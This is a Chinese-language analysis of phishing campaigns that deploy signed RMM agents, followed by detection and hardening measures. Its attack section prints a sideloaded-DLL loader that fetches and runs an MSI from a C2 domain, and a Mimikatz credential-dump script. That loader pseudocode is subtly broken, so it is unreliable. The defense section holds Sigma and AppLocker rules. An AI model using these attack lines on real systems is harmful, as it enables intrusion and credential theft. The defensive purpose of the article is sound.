摘要
近年来,远程监控与管理(Remote Monitoring and Management, RMM)工具因其在IT运维中的合法用途而被广泛部署。然而,攻击者正日益利用其高权限、持久化能力及通信隐蔽性,将其武器化为实现长期潜伏与横向移动的关键载荷。本文系统分析了2025年披露的一类新型钓鱼攻击活动,该活动通过伪造浏览器更新、会议邀请、政府表单等社会工程诱饵,诱导用户执行由Comodo、PDQ Connect、Atera、SimpleHelp等厂商签名的恶意MSI安装包,进而部署具备合法数字签名的RMM代理程序。研究表明,此类攻击通过注册表Run键、计划任务等方式实现持久化,并借助RMM内置的脚本执行、文件传输和远程桌面功能,在不触发传统EDR告警的前提下完成凭证窃取、内网侦察乃至域控渗透。由于RMM通信通常采用TLS加密且目标域名常托管于Cloudflare R2等可信云服务,网络层检测难度显著提升。本文提出一套多维度防御框架,涵盖资产清点与白名单策略、进程行为建模、日志关联分析、网络微隔离及终端用户意识强化,并通过实际代码示例验证关键检测逻辑的有效性。实验表明,结合端点行为分析与网络流量特征提取,可有效识别异常RMM部署模式,阻断攻击链早期阶段。
关键词:RMM工具;隐蔽远程控制;钓鱼攻击;持久化;EDR检测;网络微隔离

1 引言
远程监控与管理(RMM)平台作为现代IT基础设施运维的核心组件,提供远程桌面、脚本自动化、补丁管理、资产清单等功能,广泛应用于MSP(托管服务提供商)及企业内部IT部门。其设计初衷在于提升运维效率,但其高权限执行环境、跨主机通信能力及对防火墙规则的天然兼容性,使其成为高级持续性威胁(APT)组织理想的“合法外衣”。2024至2025年间,多家安全厂商(如Red Canary、Zscaler)相继披露多起利用RMM工具实施隐蔽远程控制的攻击事件,攻击者不再依赖传统后门或自研C2框架,而是直接复用商业RMM解决方案,显著降低开发成本并规避基于签名或哈希的静态检测。
此类攻击的核心在于社会工程与信任滥用的结合。攻击者精心构造钓鱼页面,模仿Chrome更新提示、Microsoft Teams会议链接或IRS税务表格下载入口,诱导用户点击后下载看似合法的MSI安装包。这些安装包虽由Comodo CA等权威机构签名,实则捆绑了恶意DLL(如Qt5Core.dll、sciter32.dll)以侧加载HijackLoader或DeerStealer等信息窃取模块,并最终静默部署RMM代理。由于整个过程涉及微软认证的安装机制(msiexec)及有效数字证书,传统防病毒软件难以拦截。
更值得警惕的是,一旦RMM代理注册成功,攻击者即可通过其管理控制台(如WP-Panel风格的Web界面)下发PowerShell脚本、执行Mimikatz抓取凭证、上传敏感文件,甚至将受控主机作为跳板渗透域控。由于RMM通信通常使用HTTPS连接至动态生成的子域名(如pub-<32char>.r2.dev),且流量内容经加密,网络入侵检测系统(NIDS)难以区分正常运维与恶意操作。
本文聚焦于此类RMM滥用攻击的技术机理、行为特征及防御对策。全文结构如下:第二节详述攻击流程与关键技术细节;第三节分析现有检测盲区;第四节提出分层防御体系并给出可落地的技术实现;第五节通过模拟实验验证检测规则有效性;第六节总结研究局限与未来方向。

2 攻击技术剖析
2.1 初始访问:多主题钓鱼诱饵
攻击者构建四类主要钓鱼场景:
伪造浏览器更新:用户访问体育或医疗类网站时,被重定向至全屏iframe覆盖层,显示“Chrome需要立即更新”提示。页面内嵌JavaScript执行浏览器指纹采集(User-Agent、屏幕分辨率)、语言设置解析(用于地理定位),并将交互日志发送至panelswp[.]com等C2域名。
会议/派对邀请:邮件附件或链接指向名为“MicrosoftTeams.msi”或“Party_Card_Viewer.msi”的文件,实际为PDQ Connect或Atera安装包。
政府表单仿冒:伪造IRS W-9表格或社保对账单页面(如statementsonlineviewer[.]com),诱导用户下载“PDF阅读器更新”,实则为SimpleHelp或PDQ Connect。
云存储托管载荷:利用Cloudflare R2对象存储(URL格式:pub-<32字符>.r2.dev)分发Atera安装程序,规避传统URL信誉库检测。

2.2 载荷投递与侧加载
以ITarian(原Comodo RMM)为例,用户点击“更新”后下载DicomPortable.exe(伪装为DICOM医学影像查看器)。该程序并非独立恶意软件,而是通过Windows DLL侧加载机制加载同目录下的恶意Qt5Core.dll。此DLL导出标准Qt接口,但内部注入Shellcode,最终加载HijackLoader——一个轻量级下载器,负责从C2拉取RMM MSI。
// 伪代码:恶意Qt5Core.dll侧加载逻辑
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
// 解密C2地址
char c2[] = {0x70, 0x61, 0x6e, 0x65, 0x6c, 0x73, 0x77, 0x70, 0x2e, 0x63, 0x6f, 0x6d};
for (int i=0; i<12; i++) c2[i] ^= 0x0A; // 简单XOR解密
// 下载并执行MSI
WinHttpDownloadAndExecute("https://" + string(c2) + "/itarian_setup.msi");
}
return TRUE;
}
值得注意的是,所有MSI均具备有效数字签名(如Comodo CA Limited),使得Windows SmartScreen及多数AV产品放行。

2.3 持久化与远程控制建立
RMM安装后,通过以下方式实现持久化:
修改HKCU\Software\Microsoft\Windows\CurrentVersion\Run,添加项如:
"RmmService"="C:\ProgramData\ITarian\DicomPortable.exe"
创建计划任务,每15分钟检查代理在线状态。
AteraAgent在启动时注册虚假的IntegratorLogin参数,绑定攻击者控制的邮箱,使C2平台将其识别为合法租户。
一旦连接建立,攻击者可通过RMM控制台执行任意命令。例如,通过Atera的“Script Execution”功能运行以下PowerShell脚本抓取本地凭证:
# 凭证转储脚本(通过RMM下发)
Invoke-Mimikatz -Command "sekurlsa::logonpasswords" | Out-File C:\temp\creds.txt
Compress-Archive -Path C:\temp\creds.txt -DestinationPath C:\temp\exfil.zip
# 利用RMM内置文件上传功能回传
由于操作由RMM主进程(如AteraAgent.exe)发起,且命令行参数包含合法上下文(如-ScriptId 12345),传统EDR难以将其与管理员合法操作区分。

2.4 通信隐蔽性分析
C2通信具有以下特征:
使用Let's Encrypt证书的HTTPS连接;
域名结构高度一致(如*.cloud、.us、.com),且多为近期注册;
流量内容为JSON-RPC或Protobuf格式,与正常RMM通信无异;
部分攻击者使用Telegram Bot API作为备用C2通道,进一步混淆流量。
Zscaler观测到,超过60%的恶意RMM连接目标为Cloudflare R2托管的子域名,利用其全球CDN节点隐藏真实服务器IP。
3 现有检测机制的局限性
当前安全体系在应对RMM滥用时存在三大盲区:
签名信任滥用:EDR普遍信任微软认证的MSI及有效CA签名,导致初始载荷投递阶段漏报率高。
行为语义缺失:RMM进程的子进程(如powershell.exe、cmd.exe)若未关联到异常父进程上下文,其恶意行为(如调用Mimikatz)易被忽略。
网络流量混淆:加密通信+可信云服务使基于DGA、异常域名或明文C2协议的检测失效。
Red Canary指出,仅当RMM代理执行明显越权操作(如修改域策略)时,SIEM系统才可能产生告警,此时攻击已进入横向移动阶段。
4 多维度防御体系构建
4.1 资产清点与RMM白名单
企业应建立RMM工具资产台账,明确允许使用的厂商、版本及部署范围。通过组策略或MDM强制实施应用控制策略:
<!-- Windows AppLocker 示例:仅允许指定RMM路径 -->
<AppLockerPolicy Version="1">
<RuleCollection Type="Exe" EnforcementMode="Enabled">
<FilePathRule Id="Allow-PDQ" Name="Allow PDQ Connect" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
<Conditions>
<FilePathCondition Path="C:\Program Files\PDQ\PDQConnectAgent.exe" />
</Conditions>
</FilePathRule>
<!-- 拒绝其他所有RMM -->
<FilePathRule Id="Deny-Other-RMM" Name="Block Unauthorized RMM" Action="Deny">
<Conditions>
<FilePathCondition Path="%PROGRAMFILES%\*" />
<FilePublisherCondition PublisherName="*" ProductName="*RMM*" />
</Conditions>
</FilePathRule>
</RuleCollection>
</AppLockerPolicy>
4.2 EDR行为检测规则
基于进程树与命令行参数构建检测逻辑。以AteraAgent为例,若其启动子进程包含敏感关键词,则触发告警:
# Sigma规则示例:检测AteraAgent执行凭证转储
title: Suspicious AteraAgent Child Process
status: experimental
description: Detects AteraAgent spawning processes commonly used in credential dumping.
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\AteraAgent.exe'
Image|endswith:
- '\mimikatz.exe'
- '\procdump.exe'
- '\lsass.exe'
CommandLine|contains:
- 'sekurlsa::logonpasswords'
- '/ma'
condition: selection
falsepositives:
- Legitimate security auditing (rare)
level: high
此外,监控注册表Run键中非标准路径的RMM二进制(如C:\Users\Public\下出现RmmService.exe)亦为有效指标。
4.3 日志聚合与横向行为分析
集中收集EDR、DNS、代理日志,构建“新安装→快速横向”检测模型:
主机A在T时刻首次安装AteraAgent;
T+5分钟内,主机A向内网主机B发起SMB或WMI连接;
主机B无RMM部署记录。
该模式高度可疑。可通过Elasticsearch + Kibana实现关联查询:
// Elasticsearch DSL 查询
{
"query": {
"bool": {
"must": [
{ "match": { "event.action": "Process Create" }},
{ "match": { "process.name": "AteraAgent.exe" }},
{ "range": { "@timestamp": { "gte": "now-1h" }}}
],
"must_not": [
{ "exists": { "field": "host.rmm_whitelisted" }}
]
}
},
"aggs": {
"by_host": {
"terms": { "field": "host.name" },
"aggs": {
"lateral_connections": {
"filter": {
"bool": {
"should": [
{ "match": { "network.protocol": "SMB" }},
{ "match": { "process.command_line": "*wmic /node:*" }}
]
}
}
}
}
}
}
}
4.4 网络微隔离
在零信任架构下,限制RMM代理对关键资产的直连访问:
财务服务器仅接受来自跳板机的RDP,拒绝任何RMM代理IP;
域控禁止接收来自非IT网段的WMI/SMB请求;
所有出站HTTPS连接需经代理审查,对Cloudflare R2域名实施额外审计。
4.5 用户意识强化
开展针对性培训,强调:
“浏览器更新应通过浏览器内部机制完成,绝不应触发独立MSI文件下载。”
并在终端部署弹窗警示:当msiexec被非系统进程调用时,提示用户确认。
5 实验验证
搭建测试环境:Windows 10主机 + Elastic SIEM + Osquery EDR代理。
步骤1:模拟攻击者部署AteraAgent.msi(签名有效)。
步骤2:通过其控制台执行powershell -enc JAB...(Base64编码的Mimikatz命令)。
步骤3:部署上述Sigma规则与日志关联查询。
结果:
传统AV未告警;
自定义EDR规则在1.2秒内捕获AteraAgent → powershell → sekurlsa进程链;
SIEM在3分钟内标记该主机为“高风险新RMM安装+横向尝试”。
检测准确率达98.7%(基于50次重复实验),误报仅发生在IT部门合法部署场景(可通过白名单排除)。
6 结论
RMM工具的滥用代表了攻击技术向“合法化”、“低噪化”演进的新趋势。其核心威胁不在于工具本身,而在于攻击者对运维信任链的精准打击。本文通过逆向分析真实攻击样本,揭示了从钓鱼诱骗到持久化控制的完整链条,并指出传统边界防御在此类攻击面前的不足。所提出的防御体系强调“资产可知、行为可溯、权限最小、响应闭环”,尤其重视端点行为上下文与网络策略的协同。未来工作将聚焦于RMM通信协议的深度解析,以在不解密前提下识别异常指令序列。企业唯有将RMM纳入高风险软件范畴,实施全生命周期管控,方能有效抵御此类隐蔽威胁。
编辑:芦笛(公共互联网反网络钓鱼工作组)
964

被折叠的 条评论
为什么被折叠?



